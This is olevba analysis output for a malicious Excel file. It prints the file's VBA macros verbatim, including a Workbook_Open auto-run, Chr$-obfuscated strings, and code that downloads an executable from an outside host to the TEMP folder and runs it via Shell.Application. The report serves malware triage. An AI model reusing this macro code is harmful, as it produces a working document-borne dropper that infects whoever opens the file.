olevba 0.25 - http://decalage.info/python/oletools
Flags       Filename
----------- -----------------------------------------------------------------
OLE:MAS---- inv86-~1.xls
(Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
===============================================================================
FILE: inv86-~1.xls
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ÝòàÊíèãà.cls
in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub Workbook_Open()
    atqk_x482mp6v
End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+----------+---------------+----------------------------------------+
| Type     | Keyword       | Description                            |
+----------+---------------+----------------------------------------+
| AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
+----------+---------------+----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Ëèñò1.cls
in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Ëèñò2.cls
in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Ëèñò3.cls
in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Class1.cls
in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Class2.cls
in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO ÀàâïàâïÀÀ.bas
in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u0410\u0430\u0432\u043f\u0430\u0432\u043f\u0410\u0410'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Public Function tIBlTVqSYlvQeRDfBAc(VdkAbaqgjbz As String) As String
    For HFncwnerBk = 1 To Len(VdkAbaqgjbz) Step 2
        tIBlTVqSYlvQeRDfBAc = tIBlTVqSYlvQeRDfBAc & Mid(VdkAbaqgjbz, HFncwnerBk, 1)
    Next
End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.
-------------------------------------------------------------------------------
VBA MACRO Class3.cls
in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Class4.cls
in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Class5.cls
in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO ûâàûâÀÀâà.bas
in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u044b\u0432\u0430\u044b\u0432\u0410\u0410\u0432\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#If VBA7 Then
Private Declare PtrSafe Function ãøÏÍØûâàà Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
    ByVal ÏÑðïñïñïïÎàï As String, _
    ByVal ÏÑðïñïñïïÎàïf As String, _
    ByVal ÏÑðïñïñïïÎàïfd As Long, _
    ByVal ÏÑðïñïñïïÎàïfds As LongPtr) As LongPtr
#Else
Private Declare Function ãøÏÍØûâàà Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
    ByVal ÏÑðïñïñïïÎàï As String, _
    ByVal ÏÑðïñïñïïÎàïf As String, _
    ByVal ÏÑðïñïñïïÎàïfd As Long, _
    ByVal ÏÑðïñïñïïÎàïfds As Long) As Long
#End If
Sub atqk_x482mp6v()
    ðïîðïÀàâïàâï tIBlTVqSYlvQeRDfBAc(Chr$(104) & Chr$(43) & Chr$(116) & Chr$(83) & Chr$(116) & Chr$(38) & Chr$(112) & Chr$(47) & Chr$(58) & Chr$(73) & Chr$(47) & Chr$(93) & Chr$(47) & Chr$(134) & Chr$(48) & Chr$(60) & Chr$(51) & Chr$(35) & Chr$(52) & Chr$(109) & Chr$(48) & Chr$(61) & Chr$(52) & Chr$(104) & Chr$(101) & Chr$(102) & Chr$(98) & Chr$(56) & Chr$(46) & Chr$(120) & Chr$(110) & Chr$(54) & Chr$(101) & Chr$(126) & Chr$(116) & Chr$(134) & Chr$(115) & Chr$(84) & Chr$(111) & Chr$(35) & Chr$(108) & Chr$(56) & Chr$(104) & Chr$(45) & Chr$(111) & Chr$(80) & Chr$(115) & Chr$(74) & Chr$(116) & Chr$(118) & Chr$(46) & Chr$(60) & Chr$(99) & Chr$(107) & Chr$(111) & Chr$(92) & Chr$(109) & Chr$(84) & Chr$(47) & Chr$(107) & Chr$(106) & Chr$(40) & Chr$(115) & Chr$(68) & Chr$(47) & Chr$(109) & Chr$(98) & Chr$(86) & Chr$(105) & Chr$(104) & Chr$(110) & Chr$(49) & Chr$(46) & Chr$(39) & Chr$(101) _
        & Chr$(96) & Chr$(120) & Chr$(99) & Chr$(101) & Chr$(62)), Environ(tIBlTVqSYlvQeRDfBAc(Chr$(84) & Chr$(96) & Chr$(77) & Chr$( _
        109) & Chr$(80) & Chr$(123))) & tIBlTVqSYlvQeRDfBAc(Chr$(92) & Chr$(81) & Chr$(102) & Chr$(106) & Chr$(74) & Chr$(105) & Chr$(67) & Chr$(36) & Chr$(104) & Chr$(43) & Chr$(106) & Chr$(48) & Chr$(102) & Chr$(132) & Chr$(103) & Chr$(80) & Chr$(68) & Chr$(109) & Chr$(54) & Chr$(95) & Chr$(55) & Chr$(65) & Chr$(53) & Chr$(130) & Chr$(101) & Chr$(134) & Chr$(68) & Chr$(74) & Chr$(84) & Chr$(129) & Chr$(85) & Chr$(37) & Chr$(46) & Chr$(64) & Chr$(101) & Chr$(57) & Chr$(120) & Chr$(124) & Chr$(101) & Chr$(50))
End Sub
Function ðïîðïÀàâïàâï(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean
    ïëðïÀÀàâïï = ãøÏÍØûâàà(0&, z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)
    Set ûâàÀÀâûàûâà = CreateObject(tIBlTVqSYlvQeRDfBAc(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))
    ûâàÀÀâûàûâà.Open Environ(tIBlTVqSYlvQeRDfBAc(Chr$(84) & Chr$(51) & Chr$(77) & Chr$(71) & Chr$(80) & Chr$(83))) & tIBlTVqSYlvQeRDfBAc(Chr$(92) & Chr$(75) & Chr$(102) & Chr$(98) & Chr$(74) & Chr$(130) & Chr$(67) & Chr$(59) & Chr$(104) & Chr$(73) & Chr$(106) & Chr$(76) & Chr$(102) & Chr$(94) & Chr$(103) & Chr$(40) & Chr$(68) & Chr$(130) & Chr$(54) & Chr$(87) & Chr$(55) & Chr$(90) & Chr$(53) & Chr$(53) & Chr$(101) & Chr$(65) & Chr$(68) & Chr$(102) & Chr$(84) & Chr$(118) & Chr$(85) & Chr$(97) & Chr$(46) & Chr$(58) & Chr$(101) & Chr$(49) & Chr$(120) & Chr$(50) & Chr$(101) & Chr$(47))
End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+--------------------+-----------------------------------------+
| Type       | Keyword            | Description                             |
+------------+--------------------+-----------------------------------------+
| Suspicious | CreateObject       | May create an OLE object                |
| Suspicious | Lib                | May run code from a DLL                 |
| Suspicious | Open               | May open a file                         |
| Suspicious | Environ            | May read system environment variables   |
| Suspicious | Chr                | May attempt to obfuscate specific       |
|            |                    | strings                                 |
| Suspicious | URLDownloadToFileA | May download files from the Internet    |
+------------+--------------------+-----------------------------------------+